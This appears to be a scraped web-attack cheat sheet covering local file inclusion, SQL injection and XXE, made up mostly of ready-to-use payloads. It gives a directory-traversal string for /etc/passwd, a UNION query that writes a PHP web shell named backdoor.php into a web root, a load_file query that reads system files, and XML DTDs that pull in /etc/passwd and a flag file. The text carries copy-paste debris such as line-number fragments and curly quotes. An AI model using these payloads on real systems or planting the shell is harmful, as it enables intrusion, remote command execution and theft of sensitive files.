Scripts that takes filenames as parameters without sanitizing the user input is typically good candidates for LFI vulnerabilities. For example, a PHP script : foo.php?file=image2.jpg An attacker would replace image2.jpg with a directory traversel payload: foo.php?file=../../../../../../../etc/passwd Or other sensitive files
SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.
|
1 2 |
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' |
Load File via SQLi Following can be used to read files from target.
|
1 2 |
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 |
XXE/XML Attack
Malicious DTD Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
<br /><?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///flag.txt”> <!ELEMENT cred (username, password)> <!ELEMENT username (#PCDATA)> <!ELEMENT password (#PCDATA)> ]> <cred> <username>&xxe;</username> <password>dsfdsf</password> </cred> <?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///etc/passwd”> <!ELEMENT subnet_mask ANY>]> <details> <subnet_mask>&xxe;</subnet_mask> <test></test> </details> |